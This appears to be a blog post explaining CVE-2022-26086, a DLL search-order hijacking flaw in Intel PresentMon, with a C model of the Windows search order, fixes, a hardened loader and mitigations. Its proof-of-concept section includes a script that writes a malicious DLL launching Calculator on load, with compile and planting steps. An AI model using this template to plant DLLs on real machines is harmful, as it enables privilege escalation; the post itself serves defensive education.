CVE-2022-26086 exposes a privilege escalation vulnerability in Intel’s PresentMon tool (before version 1.7.1). This blog post breaks down what went wrong, how it could be exploited, and how the problem was fixed—with simple code examples and reference links.
What is PresentMon?
PresentMon is a command-line tool developed by Intel® for recording frame present data in Windows games and applications. It’s an open-source, performance-analysis nerd’s delight.
The Vulnerability: Uncontrolled Search Path Element
CVE-2022-26086 is all about the search (or loading) path for required DLLs. Intel described it here:
> "Uncontrolled search path element in the PresentMon software before version 1.7.1 may allow an authenticated user to potentially enable escalation of privilege via local access."
In plain English: PresentMon loads DLLs from places it shouldn’t, letting a local attacker trick it into running their code with higher privileges.
How Does This Work?
When a Windows application loads a DLL (dynamic-link library) by name, the loader walks a fixed list of directories and takes the first file that matches. If the application's code doesn't control exactly where its DLLs come from, a local attacker who can write to one of those directories can plant a malicious DLL there and have it picked up instead of the real one. This is called DLL preloading, DLL search-order hijacking, or just DLL hijacking.
Here’s a typical, unsafe scenario:
// Bad way (example pseudo-code)
LoadLibraryA("MyHelper.dll"); // Windows checks untrusted folders!
If you just say LoadLibraryA("MyHelper.dll"), Windows walks its default search order (with SafeDllSearchMode enabled, the default on modern Windows) and loads the first MyHelper.dll it finds in:
- The directory the application was loaded from
- The system directory (C:\Windows\System32)
- The 16-bit system directory (C:\Windows\System)
- The Windows directory (C:\Windows)
- The current working directory
- The directories listed in the PATH environment variable
If an attacker can write to any directory that Windows searches before the one holding the real MyHelper.dll (or to any directory in the list at all, if the DLL is not shipped and the load would normally just fail), PresentMon will load and run the attacker's DLL without noticing.
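To make the search-order walk concrete, here is a small model of it, added for this post (it is not PresentMon's code and not from Intel): it takes the directories in the order above, records which ones hold a file with the requested name and which ones an ordinary user can write to, and reports where an attacker's copy would win. The directory names and writability flags are constructed sample data.

```c
/* Added example, not from the original post or from PresentMon: a model of the
 * Windows default DLL search order (SafeDllSearchMode on). Directory names and
 * writability flags are constructed sample data. */
#include <stdio.h>

typedef struct {
    const char *dir;    /* searched in array order */
    int has_dll;        /* a file with the requested DLL name exists here */
    int user_writable;  /* a standard (non-admin) user can create files here */
} search_entry;

/* Index of the directory the loader takes the DLL from, or -1 if the load fails. */
int resolve_dll(const search_entry *order, int n)
{
    for (int i = 0; i < n; i++)
        if (order[i].has_dll) return i;
    return -1;
}

/* Index of the first directory where an unprivileged user's copy would be
 * picked up, or -1 if the search is safe. Two cases make a load hijackable:
 *   1. a user-writable directory is searched before the legitimate copy
 *      (or the legitimate copy itself sits in a writable directory);
 *   2. the DLL is missing everywhere, so the whole order is walked and any
 *      writable directory on it is enough. */
int hijack_point(const search_entry *order, int n)
{
    for (int i = 0; i < n; i++) {
        if (order[i].user_writable) return i;  /* attacker's copy gets there first */
        if (order[i].has_dll) return -1;       /* protected legitimate copy wins */
    }
    return -1;                                 /* missing DLL, nothing writable */
}

static void report(const char *label, const search_entry *order, int n)
{
    int legit = resolve_dll(order, n);
    int h = hijack_point(order, n);
    printf("%s: real DLL %s\n", label,
           legit < 0 ? "missing (load fails)" : order[legit].dir);
    if (h < 0) printf("  safe: no user-writable directory is searched before it\n");
    else       printf("  HIJACKABLE: plant MyHelper.dll in %s\n", order[h].dir);
}

int main(void)
{
    /* Default order: app dir, System32, 16-bit System, Windows, current dir, PATH entries. */
    search_entry order[] = {
        {"C:\\Program Files\\PresentMon\\", 0, 0},
        {"C:\\Windows\\System32\\",         0, 0},
        {"C:\\Windows\\System\\",           0, 0},
        {"C:\\Windows\\",                   0, 0},
        {"C:\\Users\\alice\\Downloads\\",   0, 1},  /* cwd when launched from Explorer */
        {"C:\\Tools\\",                     0, 1},  /* PATH entry with a weak ACL */
    };
    int n = (int)(sizeof order / sizeof order[0]);

    order[0].has_dll = 1;                       /* DLL shipped next to the EXE */
    report("shipped in app dir", order, n);
    order[0].has_dll = 0; order[5].has_dll = 1; /* DLL only reachable via PATH */
    report("found only via PATH", order, n);
    order[5].has_dll = 0;                       /* DLL not installed at all */
    report("missing everywhere", order, n);
    return 0;
}
```

The two hijackable cases are the ones an auditor checks for on a real box: a DLL that is resolved through the current directory or PATH rather than the application directory, and a DLL that the program asks for but does not ship, so the load normally fails silently and any writable directory on the order satisfies it.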
Exploit Example (Proof of Concept)
Imagine you're a regular user, but PresentMon is run with higher privileges (like Administrator). By default a standard user cannot write to C:\Program Files\PresentMon\, so the realistic targets are the user-writable directories that Windows searches before it reaches the real DLL (or before the load gives up, if the DLL is not shipped at all): the working directory PresentMon is launched from, such as a Downloads or temp folder, or a user-writable entry on PATH. Save your own DLL there under the expected name.
Here’s a Python script that writes out the source of a minimal malicious DLL (it “just” launches Calculator when the DLL is loaded), followed by the compile command:
# generate evil_dll.cpp
cpp_code = r"""
#include <windows.h>
#include <stdlib.h>   // system()

// Runs as soon as the hijacked process maps this DLL, with that process's privileges.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("calc.exe");   // proof-of-concept payload: pop Calculator
    }
    return TRUE;
}
"""
with open("evil_dll.cpp", "w") as f:
    f.write(cpp_code)
# Then compile in a Visual Studio Developer Command Prompt, naming the output
# after the DLL that PresentMon looks for:
#   cl /LD evil_dll.cpp /Fe:MyHelper.dll
Once the rogue DLL is in place, the next time PresentMon loads MyHelper.dll it executes your code (calc.exe in this example) with PresentMon's privileges.
Impact
- Who can exploit it? Only someone who already has local, authenticated access to the machine, since the attack needs to drop a DLL into a directory that PresentMon searches.
- What could they do? Run their code with PresentMon's privileges, which is an escalation if PresentMon is running as a higher-privileged user (an admin or SYSTEM). If PresentMon runs as the same user who planted the DLL, nothing is gained.
- How serious? It’s a classic escalation-of-privilege flaw, most useful to an attacker as one link in a chain from an ordinary user account to admin.
The Fix
Intel fixed this in PresentMon v1.7.1:
They ensured PresentMon doesn’t load DLLs from untrusted directories.
Never load DLLs by bare file name. Always use full, trusted paths, and restrict the search order explicitly: SetDllDirectory("") removes the current directory from the search order (note that SetDllDirectory(NULL) does the opposite and restores the default order), and on Windows 8 and later (or Windows 7 with KB2533623) SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_DEFAULT_DIRS) drops both the current directory and PATH from the default search entirely.
// Safer way
SetDllDirectoryA("");   // "" removes the current directory from the search order; NULL would restore the default
LoadLibraryA("C:\\Program Files\\PresentMon\\MyHelper.dll"); // Full path: no search happens at all (real code should derive the directory from GetModuleFileName instead of hardcoding it)
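Putting those rules together, here is an added example of a hardened loader, written for this post rather than taken from PresentMon or Intel: the helper DLL is located relative to the running executable, the requested name is validated so it cannot escape that directory, and the process-wide search order is tightened before the load. The Windows API calls are compiled only on Windows; the path handling is plain C and runs anywhere. "MyHelper.dll" and the install path used in main() are placeholders.

```c
/* Added example, not PresentMon's code: load a helper DLL only from the
 * directory the running executable lives in, by absolute path, with the
 * process-wide search order tightened first. "MyHelper.dll" and the install
 * path used in main() are placeholders. */
#ifdef _WIN32
#if !defined(_WIN32_WINNT) || _WIN32_WINNT < 0x0602
#undef _WIN32_WINNT
#define _WIN32_WINNT 0x0602   /* Windows 8+: exposes the SetDefaultDllDirectories prototype */
#endif
#include <windows.h>
#endif
#include <stdio.h>
#include <string.h>

/* Copy the directory part of a module path, keeping the trailing separator.
 * Returns 0 on success, -1 if there is no separator or out is too small. */
int module_dir_from_path(const char *module_path, char *out, size_t outlen)
{
    const char *p, *sep = NULL;
    size_t n;
    for (p = module_path; *p; p++)
        if (*p == '\\' || *p == '/') sep = p;
    if (!sep) return -1;
    n = (size_t)(sep - module_path) + 1;
    if (n + 1 > outlen) return -1;
    memcpy(out, module_path, n);
    out[n] = '\0';
    return 0;
}

/* Only a bare file name is acceptable: no separators, no drive or device
 * prefix, no "." / "..", so a caller-supplied name cannot escape the dir. */
int is_bare_dll_name(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > 255) return 0;
    if (strpbrk(name, "\\/:")) return 0;
    if (strcmp(name, ".") == 0 || strcmp(name, "..") == 0) return 0;
    return 1;
}

/* Compose "<exe_dir><name>". Returns 0 on success, -1 on rejection. */
int build_trusted_dll_path(const char *exe_dir, const char *name,
                           char *out, size_t outlen)
{
    if (!is_bare_dll_name(name)) return -1;
    if (strlen(exe_dir) + strlen(name) + 1 > outlen) return -1;
    strcpy(out, exe_dir);
    strcat(out, name);
    return 0;
}

#ifdef _WIN32
/* Windows-only part. LOAD_LIBRARY_SEARCH_DEFAULT_DIRS restricts every later
 * LoadLibrary call in the process to the application directory, System32 and
 * any directory added with AddDllDirectory: the current directory and PATH
 * are no longer consulted. The helper itself is then loaded by absolute path,
 * so no search happens for it at all, and its own dependencies are resolved
 * from the application directory. */
HMODULE load_trusted_dll(const char *name)
{
    char exe_path[MAX_PATH], exe_dir[MAX_PATH], dll_path[MAX_PATH];
    if (!SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_DEFAULT_DIRS)) return NULL;
    if (GetModuleFileNameA(NULL, exe_path, MAX_PATH) == 0) return NULL;
    if (module_dir_from_path(exe_path, exe_dir, sizeof exe_dir) != 0) return NULL;
    if (build_trusted_dll_path(exe_dir, name, dll_path, sizeof dll_path) != 0) return NULL;
    return LoadLibraryExA(dll_path, NULL, LOAD_LIBRARY_SEARCH_APPLICATION_DIR);
}
#endif

int main(void)
{
    char dir[260], full[260];
    /* Constructed stand-in for what GetModuleFileNameA would return. */
    const char *exe = "C:\\Program Files\\PresentMon\\PresentMon.exe";
    if (module_dir_from_path(exe, dir, sizeof dir) == 0 &&
        build_trusted_dll_path(dir, "MyHelper.dll", full, sizeof full) == 0)
        printf("would load: %s\n", full);
    if (build_trusted_dll_path(dir, "..\\Downloads\\MyHelper.dll", full, sizeof full) != 0)
        printf("rejected: name with a path component\n");
    return 0;
}
```

The validation matters because a "full path" is only trustworthy if every component of it is: composing the executable's directory with an unchecked name would let "..\\" or an absolute path drag the load back into a user-writable location.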
Mitigations
1. Update to PresentMon 1.7.1 or later, the release that contains Intel's fix.
2. Make sure users cannot write to the directory where PresentMon is installed, or to any other directory on its DLL search path (the working directory it is launched from and every PATH entry).
3. Apply the principle of least privilege: don’t run tools like this with more privilege than needed!
Official References
- Intel Security Advisory: Intel-SA-00702
- CVE Details: CVE-2022-26086
- PresentMon Official Releases
Conclusion
CVE-2022-26086 is a classic, yet dangerous vulnerability that can be avoided by securing the way applications load external libraries. Keeping software up-to-date and restricting write permissions are your best defenses!
Have questions or want to learn more about Windows DLL exploits? Share your thoughts below!
Timeline
Published on: 11/11/2022 16:15:00 UTC
Last modified on: 11/17/2022 22:24:00 UTC